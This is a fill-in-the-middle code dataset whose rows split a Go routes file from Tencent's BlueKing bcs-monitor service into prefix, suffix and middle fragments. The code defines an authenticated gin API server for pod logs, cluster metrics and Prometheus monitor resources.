file_name large_stringlengths 4 140 | prefix large_stringlengths 0 39k | suffix large_stringlengths 0 36.1k | middle large_stringlengths 0 29.4k | fim_type large_stringclasses 4
values |
|---|---|---|---|---|
routes.go | /*
* Tencent is pleased to support the open source community by making Blueking Container Service available.
* Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package api
import (
"context"
"encoding/json"
"net/http"
"path"
"github.com/Tencent/bk-bcs/bcs-common/common/tcp/listener"
ginTracing "github.com/Tencent/bk-bcs/bcs-common/pkg/otel/trace/gin"
"github.com/TencentBlueKing/bkmonitor-kits/logger"
"github.com/gin-contrib/cors"
"github.com/gin-contrib/requestid"
"github.com/gin-gonic/gin"
"github.com/prometheus/common/route"
swaggerfiles "github.com/swaggo/files"
ginSwagger "github.com/swaggo/gin-swagger"
_ "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/docs" // docs xxx
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/logrule"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/metrics"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod"
podmonitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod_monitor"
service_monitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/servicemonitor"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/telemetry"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/config"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/middleware"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/tracing"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/storegw"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/utils"
)
// APIServer :
// APIServer wraps a gin engine and an http.Server serving the
// bcs-monitor API on an IPv4 address and, optionally, an IPv6 address.
type APIServer struct {
	ctx      context.Context // base context; passed to Shutdown in Close
	engine   *gin.Engine     // router with all API routes registered
	srv      *http.Server    // underlying HTTP server driving the engine
	addr     string          // primary (IPv4) listen address
	port     string          // listen port shared by both addresses
	addrIPv6 string          // optional IPv6 listen address; "" disables it
}
// NewAPIServer builds an API server bound to the given addresses and
// port. Routes are registered immediately, so the returned server is
// ready for Run. Gin runs in release mode.
func NewAPIServer(ctx context.Context, addr, port, addrIPv6 string) (*APIServer, error) {
	gin.SetMode(gin.ReleaseMode)

	engine := gin.Default()
	server := &APIServer{
		ctx:      ctx,
		engine:   engine,
		srv:      &http.Server{Addr: addr, Handler: engine},
		addr:     addr,
		port:     port,
		addrIPv6: addrIPv6,
	}
	server.newRoutes(engine)
	return server, nil
}
// Run builds a dual-stack listener from the configured IPv4 (and, when
// distinct, IPv6) addresses and serves HTTP on it. It blocks until the
// server stops and returns the error from Serve (http.ErrServerClosed
// after a clean Shutdown).
func (a *APIServer) Run() error {
	dualStackListener := listener.NewDualStackListener()

	// Compute the primary listen address once and reuse it for both the
	// listener and the log line (previously it was recomputed).
	addr := utils.GetListenAddr(a.addr, a.port)
	if err := dualStackListener.AddListenerWithAddr(addr); err != nil {
		return err
	}
	logger.Infow("listening for requests and metrics", "address", addr)

	// Attach an additional IPv6 listener unless it is empty or would
	// duplicate the primary address.
	if a.addrIPv6 != "" && a.addrIPv6 != a.addr {
		v6Addr := utils.GetListenAddr(a.addrIPv6, a.port)
		if err := dualStackListener.AddListenerWithAddr(v6Addr); err != nil {
			return err
		}
		logger.Infof("api serve dualStackListener with ipv6: %s", v6Addr)
	}
	return a.srv.Serve(dualStackListener)
}
// Close gracefully shuts down the HTTP server, waiting for in-flight
// requests to finish. The server's stored context bounds the shutdown;
// if that context is already canceled, Shutdown returns its error.
func (a *APIServer) Close() error {
	return a.srv.Shutdown(a.ctx)
}
// newRoutes registers middleware, the swagger/health endpoints, and the
// business routes on the engine. Business routes are mounted at the
// root, under the configured web prefix (when set), and under the API
// service prefix so the server answers on every expected path shape.
// @Title BCS-Monitor OpenAPI
// @BasePath /bcsapi/v4/monitor/api/projects/:projectId/clusters/:clusterId
func (a *APIServer) newRoutes(engine *gin.Engine) {
	// Attach an X-Request-Id header to every request for tracing.
	requestIdMiddleware := requestid.New(
		requestid.WithGenerator(func() string {
			return tracing.RequestIdGenerator()
		}),
	)
	engine.Use(requestIdMiddleware, cors.Default())

	// OpenAPI documentation: serves swagger/index.html and swagger/doc.json.
	engine.GET("/swagger/*any", ginSwagger.WrapHandler(swaggerfiles.Handler))
	engine.GET("/-/healthy", HealthyHandler)
	engine.GET("/-/ready", ReadyHandler)

	// Register HTTP routes on each mount point. Note gin panics on
	// duplicate route registration, so the prefixes are assumed distinct.
	registerRoutes(engine.Group(""))
	registerMetricsRoutes(engine.Group(""))
	if config.G.Web.RoutePrefix != "" {
		registerRoutes(engine.Group(config.G.Web.RoutePrefix))
		registerMetricsRoutes(engine.Group(config.G.Web.RoutePrefix))
	}
	registerRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
	registerMetricsRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
}
// registerRoutes mounts the log-related endpoints (pod logs, log
// collection rules, telemetry) under
// /projects/:projectId/clusters/:clusterId, guarded by authentication,
// project parsing, and namespace-scope authorization middleware.
func registerRoutes(engine *gin.RouterGroup) {
	// Log-related endpoints.
	engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.NsScopeAuthorization())
	engine.Use(ginTracing.Middleware("bcs-monitor-api"))
	route := engine.Group("/projects/:projectId/clusters/:clusterId")
	{
		route.GET("/namespaces/:namespace/pods/:pod/containers", rest.RestHandlerFunc(pod.GetPodContainers))
		route.GET("/namespaces/:namespace/pods/:pod/logs", rest.RestHandlerFunc(pod.GetPodLog))
		route.GET("/namespaces/:namespace/pods/:pod/logs/download", rest.StreamHandler(pod.DownloadPodLog))
		// SSE real-time log stream.
		route.GET("/namespaces/:namespace/pods/:pod/logs/stream", rest.StreamHandler(pod.PodLogStream))
		// BlueKing monitor agent probe.
		route.GET("/telemetry/bkmonitor_agent/", rest.STDRestHandlerFunc(telemetry.IsBKMonitorAgent))
		// bk-log log collection rules (CRUD plus retry/enable/disable).
		route.POST("/log_collector/entrypoints", rest.RestHandlerFunc(logrule.GetEntrypoints))
		route.GET("/log_collector/rules", rest.RestHandlerFunc(logrule.ListLogCollectors))
		route.POST("/log_collector/rules", rest.RestHandlerFunc(logrule.CreateLogRule))
		route.GET("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.GetLogRule))
		route.PUT("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.UpdateLogRule))
		route.DELETE("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.DeleteLogRule))
		route.POST("/log_collector/rules/:id/retry", rest.RestHandlerFunc(logrule.RetryLogRule))
		route.POST("/log_collector/rules/:id/enable", rest.RestHandlerFunc(logrule.EnableLogRule))
		route.POST("/log_collector/rules/:id/disable", rest.RestHandlerFunc(logrule.DisableLogRule))
	}
}
// registerMetricsRoutes metrics 相关接口
func registerMetricsRoutes(engine *gin.RouterGroup) {
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.ProjectAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
// 命名规范
// usage 代表 百分比
// used 代表已使用
// overview, info 数值量
route := engine.Group("/metrics/projects/:projectCode/clusters/:clusterId")
{
route.GET("/overview", rest.RestHandlerFunc(metrics.GetClusterOverview))
route.GET("/cpu_usage", rest.RestHandlerFunc(metrics.ClusterCPUUsage))
route.GET("/cpu_request_usage", rest.RestHandlerFunc(metrics.ClusterCPURequestUsage))
route.GET("/memory_usage", rest.RestHandlerFunc(metrics.ClusterMemoryUsage))
route.GET("/memory_request_usage", rest.RestHandlerFunc(metrics.ClusterMemoryRequestUsage)) | route.GET("/nodes/:node/cpu_usage", rest.RestHandlerFunc(metrics.GetNodeCPUUsage))
route.GET("/nodes/:node/cpu_request_usage", rest.RestHandlerFunc(metrics.GetNodeCPURequestUsage))
route.GET("/nodes/:node/memory_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryUsage))
route.GET("/nodes/:node/memory_request_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryRequestUsage))
route.GET("/nodes/:node/network_receive", rest.RestHandlerFunc(metrics.GetNodeNetworkReceiveUsage))
route.GET("/nodes/:node/network_transmit", rest.RestHandlerFunc(metrics.GetNodeNetworkTransmitUsage))
route.GET("/nodes/:node/disk_usage", rest.RestHandlerFunc(metrics.GetNodeDiskUsage))
route.GET("/nodes/:node/diskio_usage", rest.RestHandlerFunc(metrics.GetNodeDiskioUsage))
route.POST("/namespaces/:namespace/pods/cpu_usage", rest.RestHandlerFunc(
metrics.PodCPUUsage)) // 多个Pod场景, 可能有几十,上百Pod场景, 需要使用 Post 传递参数
route.POST("/namespaces/:namespace/pods/memory_used", rest.RestHandlerFunc(metrics.PodMemoryUsed))
route.POST("/namespaces/:namespace/pods/network_receive", rest.RestHandlerFunc(metrics.PodNetworkReceive))
route.POST("/namespaces/:namespace/pods/network_transmit", rest.RestHandlerFunc(metrics.PodNetworkTransmit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_usage",
rest.RestHandlerFunc(metrics.ContainerCPUUsage))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_used",
rest.RestHandlerFunc(metrics.ContainerMemoryUsed))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_limit",
rest.RestHandlerFunc(metrics.ContainerCPULimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_limit",
rest.RestHandlerFunc(metrics.ContainerMemoryLimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_read_total",
rest.RestHandlerFunc(metrics.ContainerDiskReadTotal))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_write_total",
rest.RestHandlerFunc(metrics.ContainerDiskWriteTotal))
route.GET("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.GET("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.GetServiceMonitor))
route.POST("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.CreateServiceMonitor))
route.PUT("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.UpdateServiceMonitor))
route.DELETE("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.DeleteServiceMonitor))
route.GET("/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.POST("/service_monitors/batchdelete",
rest.RestHandlerFunc(service_monitor.BatchDeleteServiceMonitor))
route.GET("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.GET("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.GetPodMonitor))
route.POST("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.CreatePodMonitor))
route.PUT("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.UpdatePodMonitor))
route.DELETE("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.DeletePodMonitor))
route.GET("/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.POST("/pod_monitors/batchdelete",
rest.RestHandlerFunc(podmonitor.BatchDeletePodMonitor))
}
}
// RegisterStoreGWRoutes builds a router exposing the storegw Prometheus
// HTTP service-discovery (http_sd) endpoint. GET
// /api/discovery/targetgroups returns the gateway's current target
// groups as JSON.
func RegisterStoreGWRoutes(gw *storegw.StoreGW) *route.Router {
	router := route.New()
	router.Get("/api/discovery/targetgroups", func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", "application/json; charset=utf-8")
		// The header is already written, so an encode failure cannot be
		// reported to the client; log it instead of dropping it silently.
		if err := json.NewEncoder(w).Encode(gw.TargetGroups()); err != nil {
			logger.Errorf("encode target groups: %s", err)
		}
	})
	return router
}
// HealthyHandler is the liveness probe; it always answers 200 with a
// plain-text "OK" body.
func HealthyHandler(c *gin.Context) {
	// c.String writes with Content-Type "text/plain; charset=utf-8",
	// matching the explicit c.Data form.
	c.String(http.StatusOK, "OK")
}
// ReadyHandler 健康检查
func ReadyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
} | route.GET("/disk_usage", rest.RestHandlerFunc(metrics.ClusterDiskUsage))
route.GET("/diskio_usage", rest.RestHandlerFunc(metrics.ClusterDiskioUsage))
route.GET("/pod_usage", rest.RestHandlerFunc(metrics.ClusterPodUsage))
route.GET("/nodes/:node/info", rest.RestHandlerFunc(metrics.GetNodeInfo))
route.GET("/nodes/:node/overview", rest.RestHandlerFunc(metrics.GetNodeOverview)) | random_line_split |
routes.go | /*
* Tencent is pleased to support the open source community by making Blueking Container Service available.
* Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package api
import (
"context"
"encoding/json"
"net/http"
"path"
"github.com/Tencent/bk-bcs/bcs-common/common/tcp/listener"
ginTracing "github.com/Tencent/bk-bcs/bcs-common/pkg/otel/trace/gin"
"github.com/TencentBlueKing/bkmonitor-kits/logger"
"github.com/gin-contrib/cors"
"github.com/gin-contrib/requestid"
"github.com/gin-gonic/gin"
"github.com/prometheus/common/route"
swaggerfiles "github.com/swaggo/files"
ginSwagger "github.com/swaggo/gin-swagger"
_ "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/docs" // docs xxx
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/logrule"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/metrics"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod"
podmonitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod_monitor"
service_monitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/servicemonitor"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/telemetry"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/config"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/middleware"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/tracing"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/storegw"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/utils"
)
// APIServer :
type APIServer struct {
ctx context.Context
engine *gin.Engine
srv *http.Server
addr string
port string
addrIPv6 string
}
// NewAPIServer :
func NewAPIServer(ctx context.Context, addr, port, addrIPv6 string) (*APIServer, error) {
gin.SetMode(gin.ReleaseMode)
engine := gin.Default()
srv := &http.Server{Addr: addr, Handler: engine}
s := &APIServer{
ctx: ctx,
engine: engine,
srv: srv,
addr: addr,
port: port,
addrIPv6: addrIPv6,
}
s.newRoutes(engine)
return s, nil
}
// Run :
func (a *APIServer) Run() error {
dualStackListener := listener.NewDualStackListener()
addr := utils.GetListenAddr(a.addr, a.port)
if err := dualStackListener.AddListenerWithAddr(utils.GetListenAddr(a.addr, a.port)); err != nil {
return err
}
logger.Infow("listening for requests and metrics", "address", addr)
if a.addrIPv6 != "" && a.addrIPv6 != a.addr {
v6Addr := utils.GetListenAddr(a.addrIPv6, a.port)
if err := dualStackListener.AddListenerWithAddr(v6Addr); err != nil {
return err
}
logger.Infof("api serve dualStackListener with ipv6: %s", v6Addr)
}
return a.srv.Serve(dualStackListener)
}
// Close :
func (a *APIServer) Close() error {
return a.srv.Shutdown(a.ctx)
}
// newRoutes xxx
// @Title BCS-Monitor OpenAPI
// @BasePath /bcsapi/v4/monitor/api/projects/:projectId/clusters/:clusterId
func (a *APIServer) newRoutes(engine *gin.Engine) {
// 添加 X-Request-Id 头部
requestIdMiddleware := requestid.New(
requestid.WithGenerator(func() string {
return tracing.RequestIdGenerator()
}),
)
engine.Use(requestIdMiddleware, cors.Default())
// openapi 文档
// 访问 swagger/index.html, swagger/doc.json
engine.GET("/swagger/*any", ginSwagger.WrapHandler(swaggerfiles.Handler))
engine.GET("/-/healthy", HealthyHandler)
engine.GET("/-/ready", ReadyHandler)
// 注册 HTTP 请求
registerRoutes(engine.Group(""))
registerMetricsRoutes(engine.Group(""))
if config.G.Web.RoutePrefix != "" {
registerRoutes(engine.Group(config.G.Web.RoutePrefix))
registerMetricsRoutes(engine.Group(config.G.Web.RoutePrefix))
}
registerRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
registerMetricsRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
}
func registerRoutes(engine *gin.RouterGroup) {
// 日志相关接口
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.NsScopeAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
route := engine.Group("/projects/:projectId/clusters/:clusterId")
{
route.GET("/namespaces/:namespace/pods/:pod/containers", rest.RestHandlerFunc(pod.GetPodContainers))
route.GET("/namespaces/:namespace/pods/:pod/logs", rest.RestHandlerFunc(pod.GetPodLog))
route.GET("/namespaces/:namespace/pods/:pod/logs/download", rest.StreamHandler(pod.DownloadPodLog))
// sse 实时日志流
route.GET("/namespaces/:namespace/pods/:pod/logs/stream", rest.StreamHandler(pod.PodLogStream))
// 蓝鲸监控采集器
route.GET("/telemetry/bkmonitor_agent/", rest.STDRestHandlerFunc(telemetry.IsBKMonitorAgent))
// bk-log 日志采集规则
route.POST("/log_collector/entrypoints", rest.RestHandlerFunc(logrule.GetEntrypoints))
route.GET("/log_collector/rules", rest.RestHandlerFunc(logrule.ListLogCollectors))
route.POST("/log_collector/rules", rest.RestHandlerFunc(logrule.CreateLogRule))
route.GET("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.GetLogRule))
route.PUT("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.UpdateLogRule))
route.DELETE("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.DeleteLogRule))
route.POST("/log_collector/rules/:id/retry", rest.RestHandlerFunc(logrule.RetryLogRule))
route.POST("/log_collector/rules/:id/enable", rest.RestHandlerFunc(logrule.EnableLogRule))
route.POST("/log_collector/rules/:id/disable", rest.RestHandlerFunc(logrule.DisableLogRule))
}
}
// registerMetricsRoutes mounts the metrics endpoints (cluster, node,
// pod, container usage plus ServiceMonitor/PodMonitor management) under
// /metrics/projects/:projectCode/clusters/:clusterId, guarded by
// authentication, project parsing, and project authorization middleware.
func registerMetricsRoutes(engine *gin.RouterGroup) {
	engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.ProjectAuthorization())
	engine.Use(ginTracing.Middleware("bcs-monitor-api"))
	// Naming convention:
	// "usage" denotes a percentage
	// "used" denotes an absolute consumed amount
	// "overview", "info" denote scalar values
	route := engine.Group("/metrics/projects/:projectCode/clusters/:clusterId")
	{
		route.GET("/overview", rest.RestHandlerFunc(metrics.GetClusterOverview))
		route.GET("/cpu_usage", rest.RestHandlerFunc(metrics.ClusterCPUUsage))
		route.GET("/cpu_request_usage", rest.RestHandlerFunc(metrics.ClusterCPURequestUsage))
		route.GET("/memory_usage", rest.RestHandlerFunc(metrics.ClusterMemoryUsage))
		route.GET("/memory_request_usage", rest.RestHandlerFunc(metrics.ClusterMemoryRequestUsage))
		route.GET("/disk_usage", rest.RestHandlerFunc(metrics.ClusterDiskUsage))
		route.GET("/diskio_usage", rest.RestHandlerFunc(metrics.ClusterDiskioUsage))
		route.GET("/pod_usage", rest.RestHandlerFunc(metrics.ClusterPodUsage))
		route.GET("/nodes/:node/info", rest.RestHandlerFunc(metrics.GetNodeInfo))
		route.GET("/nodes/:node/overview", rest.RestHandlerFunc(metrics.GetNodeOverview))
		route.GET("/nodes/:node/cpu_usage", rest.RestHandlerFunc(metrics.GetNodeCPUUsage))
		route.GET("/nodes/:node/cpu_request_usage", rest.RestHandlerFunc(metrics.GetNodeCPURequestUsage))
		route.GET("/nodes/:node/memory_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryUsage))
		route.GET("/nodes/:node/memory_request_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryRequestUsage))
		route.GET("/nodes/:node/network_receive", rest.RestHandlerFunc(metrics.GetNodeNetworkReceiveUsage))
		route.GET("/nodes/:node/network_transmit", rest.RestHandlerFunc(metrics.GetNodeNetworkTransmitUsage))
		route.GET("/nodes/:node/disk_usage", rest.RestHandlerFunc(metrics.GetNodeDiskUsage))
		route.GET("/nodes/:node/diskio_usage", rest.RestHandlerFunc(metrics.GetNodeDiskioUsage))
		route.POST("/namespaces/:namespace/pods/cpu_usage", rest.RestHandlerFunc(
			metrics.PodCPUUsage)) // POST because pod lists may hold tens to hundreds of pods; the parameters travel in the body
		route.POST("/namespaces/:namespace/pods/memory_used", rest.RestHandlerFunc(metrics.PodMemoryUsed))
		route.POST("/namespaces/:namespace/pods/network_receive", rest.RestHandlerFunc(metrics.PodNetworkReceive))
		route.POST("/namespaces/:namespace/pods/network_transmit", rest.RestHandlerFunc(metrics.PodNetworkTransmit))
		route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_usage",
			rest.RestHandlerFunc(metrics.ContainerCPUUsage))
		route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_used",
			rest.RestHandlerFunc(metrics.ContainerMemoryUsed))
		route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_limit",
			rest.RestHandlerFunc(metrics.ContainerCPULimit))
		route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_limit",
			rest.RestHandlerFunc(metrics.ContainerMemoryLimit))
		route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_read_total",
			rest.RestHandlerFunc(metrics.ContainerDiskReadTotal))
		route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_write_total",
			rest.RestHandlerFunc(metrics.ContainerDiskWriteTotal))
		route.GET("/namespaces/:namespace/service_monitors",
			rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
		route.GET("/namespaces/:namespace/service_monitors/:name",
			rest.RestHandlerFunc(service_monitor.GetServiceMonitor))
		route.POST("/namespaces/:namespace/service_monitors",
			rest.RestHandlerFunc(service_monitor.CreateServiceMonitor))
		route.PUT("/namespaces/:namespace/service_monitors/:name",
			rest.RestHandlerFunc(service_monitor.UpdateServiceMonitor))
		route.DELETE("/namespaces/:namespace/service_monitors/:name",
			rest.RestHandlerFunc(service_monitor.DeleteServiceMonitor))
		route.GET("/service_monitors",
			rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
		route.POST("/service_monitors/batchdelete",
			rest.RestHandlerFunc(service_monitor.BatchDeleteServiceMonitor))
		route.GET("/namespaces/:namespace/pod_monitors",
			rest.RestHandlerFunc(podmonitor.ListPodMonitors))
		route.GET("/namespaces/:namespace/pod_monitors/:name",
			rest.RestHandlerFunc(podmonitor.GetPodMonitor))
		route.POST("/namespaces/:namespace/pod_monitors",
			rest.RestHandlerFunc(podmonitor.CreatePodMonitor))
		route.PUT("/namespaces/:namespace/pod_monitors/:name",
			rest.RestHandlerFunc(podmonitor.UpdatePodMonitor))
		route.DELETE("/namespaces/:namespace/pod_monitors/:name",
			rest.RestHandlerFunc(podmonitor.DeletePodMonitor))
		route.GET("/pod_monitors",
			rest.RestHandlerFunc(podmonitor.ListPodMonitors))
		route.POST("/pod_monitors/batchdelete",
			rest.RestHandlerFunc(podmonitor.BatchDeletePodMonitor))
	}
}
// RegisterStoreGWRoutes 注册storegw http-sd
func RegisterStoreGWRoutes(gw *storegw.StoreGW) *route.Router {
router := route.New()
router.Get("/api/discovery/targetgroups", func(w http.ResponseWriter, r *http.R | ).Set("Content-Type", "application/json; charset=utf-8")
json.NewEncoder(w).Encode(gw.TargetGroups())
})
return router
}
// HealthyHandler 健康检查
func HealthyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
}
// ReadyHandler is the readiness probe; it always answers 200 with a
// plain-text "OK" body.
func ReadyHandler(c *gin.Context) {
	// c.String writes with Content-Type "text/plain; charset=utf-8",
	// matching the explicit c.Data form.
	c.String(http.StatusOK, "OK")
}
| equest) {
w.Header( | identifier_name |
routes.go | /*
* Tencent is pleased to support the open source community by making Blueking Container Service available.
* Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package api
import (
"context"
"encoding/json"
"net/http"
"path"
"github.com/Tencent/bk-bcs/bcs-common/common/tcp/listener"
ginTracing "github.com/Tencent/bk-bcs/bcs-common/pkg/otel/trace/gin"
"github.com/TencentBlueKing/bkmonitor-kits/logger"
"github.com/gin-contrib/cors"
"github.com/gin-contrib/requestid"
"github.com/gin-gonic/gin"
"github.com/prometheus/common/route"
swaggerfiles "github.com/swaggo/files"
ginSwagger "github.com/swaggo/gin-swagger"
_ "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/docs" // docs xxx
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/logrule"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/metrics"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod"
podmonitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod_monitor"
service_monitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/servicemonitor"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/telemetry"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/config"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/middleware"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/tracing"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/storegw"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/utils"
)
// APIServer :
type APIServer struct {
ctx context.Context
engine *gin.Engine
srv *http.Server
addr string
port string
addrIPv6 string
}
// NewAPIServer :
func NewAPIServer(ctx context.Context, addr, port, addrIPv6 string) (*APIServer, error) {
gin.SetMode(gin.ReleaseMode)
engine := gin.Default()
srv := &http.Server{Addr: addr, Handler: engine}
s := &APIServer{
ctx: ctx,
engine: engine,
srv: srv,
addr: addr,
port: port,
addrIPv6: addrIPv6,
}
s.newRoutes(engine)
return s, nil
}
// Run :
func (a *APIServer) Run() error {
dualStackListener := listener.NewDualStackListener()
addr := utils.GetListenAddr(a.addr, a.port)
if err := dualStackListener.AddListenerWithAddr(utils.GetListenAddr(a.addr, a.port)); err != nil {
return err
}
logger.Infow("listening for requests and metrics", "address", addr)
if a.addrIPv6 != "" && a.addrIPv6 != a.addr {
v6Addr := utils.GetListenAddr(a.addrIPv6, a.port)
if err := dualStackListener.AddListenerWithAddr(v6Addr); err != nil {
return err
}
logger.Infof("api serve dualStackListener with ipv6: %s", v6Addr)
}
return a.srv.Serve(dualStackListener)
}
// Close :
func (a *APIServer) Close() error {
return a.srv.Shutdown(a.ctx)
}
// newRoutes xxx
// @Title BCS-Monitor OpenAPI
// @BasePath /bcsapi/v4/monitor/api/projects/:projectId/clusters/:clusterId
func (a *APIServer) newRoutes(engine *gin.Engine) {
// 添加 X-Request-Id 头部
requestIdMiddleware := requestid.New(
requestid.WithGenerator(func() string {
return tracing.RequestIdGenerator()
}),
)
engine.Use(requestIdMiddleware, cors.Default())
// openapi 文档
// 访问 swagger/index.html, swagger/doc.json
engine.GET("/swagger/*any", ginSwagger.WrapHandler(swaggerfiles.Handler))
engine.GET("/-/healthy", HealthyHandler)
engine.GET("/-/ready", ReadyHandler)
// 注册 HTTP 请求
registerRoutes(engine.Group(""))
registerMetricsRoutes(engine.Group(""))
if config.G.Web.RoutePrefix != "" {
registerRoutes(engine.Group(config.G.Web.RoutePrefix))
registerMetricsRoutes(engine.Group(config.G.Web.RoutePrefix))
}
registerRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
registerMetricsRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
}
func registerRoutes(engine *gin.RouterGroup) {
// 日志相关接口
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.NsScopeAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
